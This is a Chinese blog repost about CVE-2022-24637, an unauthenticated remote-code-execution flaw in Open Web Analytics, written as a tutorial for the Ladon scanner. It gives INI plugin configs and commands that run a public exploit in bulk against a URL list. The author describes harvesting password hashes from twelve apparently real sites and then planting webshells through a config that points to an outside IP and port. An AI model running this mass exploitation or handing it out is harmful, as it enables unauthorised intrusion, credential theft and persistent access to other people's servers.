CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)

admin 2022年11月30日12:10:19评论141 views字数 924阅读3分4秒阅读模式

本文主要教大家如何配置Ladon的INI插件,实现快速批量验证POC。该漏洞除了练手或提交SRC,可能没什么用,OWA登陆界面如下

CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)

Ladon插件 CVE-2022-24637.ini

INI插件最大的优势在于,可调用任意语言编写的POC,就是说在没有源码的情况下也可以,只要知道如何使用POC,然后填写参数,设置URL变量或IP变量即可。当别人放出POC时,我们只需要验证出一个成功的,即可Ladon批量

[Ladon]exe=pythonarg=CVE-2022-24637.py $ip$ -clog=true

批量命令

Ladon url.txt cve-2022-24637

CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)

由于本地没搭有环境,EXP也是github上找的,并不知道成功是怎样的,所以没有重定向,先让Ladon跑一些URL,成功如上图所示,检测出漏洞时同时返回密码HASH,当然也有一些有漏洞但无法获取HASH的。重定向后,稍等一分钟,就自动获取了12个密码。

CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)

查看密码对应URL,再使用EXP写入webshell

CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)

批量GetShell配置

[Ladon]exe=pythonarg=CVE-2022-24637.py $ip$ -i 123.123.123.123 -p 4444 -u adminlog=true

webshell是随机地址,我们可以重定向输出结果

Ladon url.txt GetShell.ini > shell.txt


PS: 与Ladon联动的最佳Poc为.net编写的程序或DLL,可使用LadonEXP一键生成大部份WEB相关POC,非WEB洞需自己编写。

POC: https://www.exploit-db.com/exploits/51026

相关文章

Ladon9.3.0 & CobaltStrike & Exchange ProxyShell漏洞复现

Ladon 9.2.1 Cisco漏洞复现批量GetShell、IIS后门、指纹识别、CMS识别

LadonExp教程-WordPress密码审计原理

LadonExp教程CVE-2022–21661 WordPress漏洞复现

原文始发于微信公众号(K8实验室):CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月30日12:10:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)http://cn-sec.com/archives/1434776.html

发表评论

匿名网友 填写信息